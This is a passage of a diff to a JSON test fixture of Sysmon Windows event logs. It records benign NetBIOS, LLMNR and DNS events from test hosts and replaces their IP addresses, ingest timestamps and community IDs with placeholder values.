Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8516,27 +8430,27 @@ "type": "CNAME" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -8552,16 +8466,13 @@ "images.taboola.com" ], "ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313844976Z", + "ingested": "2021-12-09T13:49:44.739498700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -8637,7 +8548,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313846392Z", + "ingested": "2021-12-09T13:49:44.739502500Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e14\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:e488:b85c:5262:ff86\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8689,15 +8600,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:4300:6800:7200:6f00:6d00:6500" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55542, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:sejGGvgk92xTvKdzlFitndKqdWw=", + "community_id": "1:zjVE29ipqvMTvzEUbTYQ6tGBM08=", "transport": "udp", "type": "ipv6", "direction": "egress" @@ -8711,14 +8622,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "e000:fc:4300:6800:7200:6f00:6d00:6500" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313847755Z", + "ingested": "2021-12-09T13:49:44.739507200Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8767,15 +8677,15 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -8789,14 +8699,13 @@ "SYSTEM" ], "ip": [ - "169.254.180.25", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313849316Z", + "ingested": "2021-12-09T13:49:44.739513Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8845,15 +8754,15 @@ }, "destination": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "ingress" @@ -8867,14 +8776,13 @@ "SYSTEM" ], "ip": [ - "169.254.255.255", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313850779Z", + "ingested": "2021-12-09T13:49:44.739516600Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8951,7 +8859,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313852225Z", + "ingested": "2021-12-09T13:49:44.739520400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e18\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:616f:32fa:b04f:b419\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -9003,15 +8911,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:0:0:0:0:0:0" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55717, - "ip": "a9fe:b419:0:0:f880:2301:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:SHkoHfPFDYWai8qQBwIiRxvCPZw=", + "community_id": "1:CbJTXAoYGQFCeKHghMVMZBaSXX0=", "transport": "udp", "type": "ipv6", "direction": "egress" @@ -9025,14 +8933,13 @@ "NETWORK SERVICE" ], "ip": [ - "a9fe:b419:0:0:f880:2301:e0:ffff", - "e000:fc:0:0:0:0:0:0" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313853653Z", + "ingested": "2021-12-09T13:49:44.739523800Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData 